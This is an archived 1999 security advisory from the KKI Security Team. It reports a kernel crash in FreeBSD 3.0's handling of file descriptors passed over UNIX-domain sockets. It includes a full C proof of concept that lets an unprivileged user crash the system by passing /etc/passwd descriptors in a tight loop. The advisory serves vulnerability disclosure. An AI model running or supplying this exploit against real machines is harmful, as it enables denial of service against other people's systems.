KKIS.05051999.003b

From: Lukasz Luzar (lluzarat_private)
Date: Wed May 05 1999 - 02:26:21 PDT


    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    
                              ###  ###  ###  ###  ###
                              ### ###   ### ###   ###
                              ######    ######    ###
                              ### ###   ### ###   ###
                              ###  ###  ###  ###  ###
    
                                  S E C U R I T Y
    
    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~[ Contacts ]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
     KKI Security Team                              Cracow Commercial Internet
     http://www.security.kki.pl                     http://www.kki.pl
     mailto:securityat_private                mailto:biuroat_private
    
    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~[ Information ]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
     Report title        : Security problem with sockets in FreeBSD's
                           implementation of UNIX-domain protocol family.
     Problem found by    : Lukasz Luzar (lluzarat_private)
     Report created by   : Robert Pajak (shadowat_private)
                           Lukasz Luzar (lluzarat_private)
     Report published    : 5th May 1999
     Report code         : KKIS.05051999.003.b
     Systems affected    : FreeBSD-3.0; possibly also 3.1
     Archive             : http://www.security.kki.pl/advisories/
     Risk level          : high
    
    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~[ Description ]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      As the unix(4) manual page puts it, "The UNIX-domain protocol family is
     a collection of protocols that provides local interprocess communication
     through the normal socket mechanism. It supports the SOCK_STREAM and
     SOCK_DGRAM socket types and uses filesystem pathnames for addressing."
      SOCK_STREAM sockets also support passing UNIX file descriptors between
     processes through the sendmsg() and recvmsg() functions, as an
     SCM_RIGHTS control message. (Descriptors can be passed the same way over
     SOCK_DGRAM sockets, which is what the attached example uses.)
      While testing the UNIX-domain protocols we found a probable bug in
     FreeBSD's implementation of this mechanism.
      When we ran the attached example on FreeBSD-3.0 as an ordinary local
     user, the system crashed immediately with the error "Supervisor read,
     page not present" in kernel mode, i.e. a fatal page fault taken by the
     kernel itself.
    
    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~[ Example ]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
     See the attached example.c below. The program forks. The parent
     ("server") binds a SOCK_DGRAM socket on /tmp/123 and, for every
     datagram it receives, opens /etc/passwd and sends the open descriptor
     back to the sender in an SCM_RIGHTS control message that carries no
     data payload. The child ("client") loops forever: it creates a fresh
     socket bound to /tmp/123.tmp, sends a one-byte datagram to the server,
     reads the passed descriptor with recvmsg(), and closes both the
     descriptor and the socket. No privileges are needed; on an affected
     kernel the machine crashes immediately, so run it only on a test box.
    
    ~~~~~~~~~~~~~~~~~~~~~~~~~~[ Copyright statement ]~~~~~~~~~~~~~~~~~~~~~~~~~~~~
     Copyright (c) 1999 KKI Security Team, Poland
     All rights reserved.
    
     All questions please address to mailto:securityat_private
    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    
    
    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~[ example.c ]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    
    /* example.c - attachment to KKIS.05051999.003b
     * Crashes FreeBSD-3.0 by passing descriptors over UNIX-domain datagram
     * sockets in a tight loop (see the advisory above). */
    #include <stdio.h>
    #include <string.h>
    #include <errno.h>
    #include <sys/types.h>
    #include <sys/socket.h>
    #include <sys/un.h>
    #include <fcntl.h>
    #include <unistd.h>
    
    #define PATH      "/tmp/123"       /* server socket */
    #define PATH_TMP  "/tmp/123.tmp"   /* client socket */
    #define SOME_FILE "/etc/passwd"    /* any readable file; its descriptor is passed */
    
    /* Ancillary-data buffer: a cmsghdr immediately followed by one descriptor
     * (the SCM_RIGHTS payload). This hand-made layout works where
     * sizeof(struct cmsghdr) is a multiple of the alignment of int, as on
     * i386; CMSG_SPACE()/CMSG_DATA() would be the portable way. */
    struct mycmsghdr {
        struct cmsghdr hdr;
        int            fd;
    };
    
    void server(void);
    void client(void);
    
    int main(void)
    {
        switch (fork()) {
        case -1:
            printf("fork error %d\n", errno);
            break;
        case 0:
            for (;;)            /* child: request a descriptor over and over */
                client();
        default:
            server();           /* parent: hand out descriptors */
        }
        return 0;
    }
    
    /* Parent. Waits for a datagram on PATH, then sends the sender a freshly
     * opened descriptor for SOME_FILE in an SCM_RIGHTS control message. */
    void server(void)
    {
        struct sockaddr_un addr;
        struct msghdr      mymsghdr;
        struct mycmsghdr   ancdbuf;
        char               data[1];
        socklen_t          len;
        int                sockfd, fd;
    
        if (unlink(PATH) == -1)
            printf("unlink error %d\n", errno);
    
        if ((sockfd = socket(AF_UNIX, SOCK_DGRAM, 0)) == -1)
            printf("socket error %d\n", errno);
    
        strcpy(addr.sun_path, PATH);
        addr.sun_len = sizeof(addr.sun_len) + sizeof(addr.sun_family)
                       + strlen(addr.sun_path);
        addr.sun_family = AF_UNIX;
    
        if (bind(sockfd, (struct sockaddr *) &addr, addr.sun_len) == -1)
            printf("bind error %d\n", errno);
    
        for (;;) {
            if ((fd = open(SOME_FILE, O_RDONLY)) == -1)
                printf("open file error %d\n", errno);
    
            /* recvfrom() fills in the client's address; the reply goes there. */
            len = sizeof(addr.sun_path);
            if (recvfrom(sockfd, data, sizeof(data), 0,
                         (struct sockaddr *) &addr, &len) == -1)
                printf("recvfrom error %d\n", errno);
    
            ancdbuf.hdr.cmsg_len   = sizeof(ancdbuf);
            ancdbuf.hdr.cmsg_level = SOL_SOCKET;
            ancdbuf.hdr.cmsg_type  = SCM_RIGHTS;
            ancdbuf.fd             = fd;
    
            /* No data payload at all: only the ancillary descriptor. */
            mymsghdr.msg_name       = (caddr_t) &addr;
            mymsghdr.msg_namelen    = len;
            mymsghdr.msg_iov        = NULL;
            mymsghdr.msg_iovlen     = 0;
            mymsghdr.msg_control    = (caddr_t) &ancdbuf;
            mymsghdr.msg_controllen = ancdbuf.hdr.cmsg_len;
            mymsghdr.msg_flags      = 0;
    
            if (sendmsg(sockfd, &mymsghdr, 0) == -1)
                printf("sendmsg error %d\n", errno);
    
            close(fd);          /* the in-flight copy lives on in the socket buffer */
        }
    }
    
    /* Child. Every call creates a new socket bound to PATH_TMP, pokes the
     * server with a one-byte datagram, receives the passed descriptor, and
     * closes both the descriptor and the socket. */
    void client(void)
    {
        struct sockaddr_un addr_s, addr_c;
        struct mycmsghdr   ancdbuf;
        struct msghdr      mymsghdr;
        char               data[1] = { 0 };
        int                sockfd, fd;
    
        if ((sockfd = socket(AF_UNIX, SOCK_DGRAM, 0)) == -1)
            printf("socket error %d\n", errno);
    
        if (unlink(PATH_TMP) == -1)
            printf("unlink error %d\n", errno);
    
        strcpy(addr_c.sun_path, PATH_TMP);
        addr_c.sun_len = sizeof(addr_c.sun_len) + sizeof(addr_c.sun_family)
                         + strlen(addr_c.sun_path);
        addr_c.sun_family = AF_UNIX;
    
        strcpy(addr_s.sun_path, PATH);
        addr_s.sun_len = sizeof(addr_s.sun_len) + sizeof(addr_s.sun_family)
                         + strlen(addr_s.sun_path);
        addr_s.sun_family = AF_UNIX;
    
        if (bind(sockfd, (struct sockaddr *) &addr_c, addr_c.sun_len) == -1)
            printf("bind error %d\n", errno);
    
        if (sendto(sockfd, data, sizeof(data), 0,
                   (struct sockaddr *) &addr_s, addr_s.sun_len) == -1)
            printf("sendto error %d\n", errno);
    
        ancdbuf.hdr.cmsg_len   = sizeof(ancdbuf);
        ancdbuf.hdr.cmsg_level = SOL_SOCKET;
        ancdbuf.hdr.cmsg_type  = SCM_RIGHTS;
    
        mymsghdr.msg_name       = NULL;
        mymsghdr.msg_namelen    = 0;
        mymsghdr.msg_iov        = NULL;
        mymsghdr.msg_iovlen     = 0;
        mymsghdr.msg_control    = (caddr_t) &ancdbuf;
        mymsghdr.msg_controllen = ancdbuf.hdr.cmsg_len;
        mymsghdr.msg_flags      = 0;
    
        if (recvmsg(sockfd, &mymsghdr, 0) == -1)
            printf("recvmsg error %d\n", errno);
    
        fd = ancdbuf.fd;
    
        close(fd);
        close(sockfd);
    }
    



    This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 14:44:59 PDT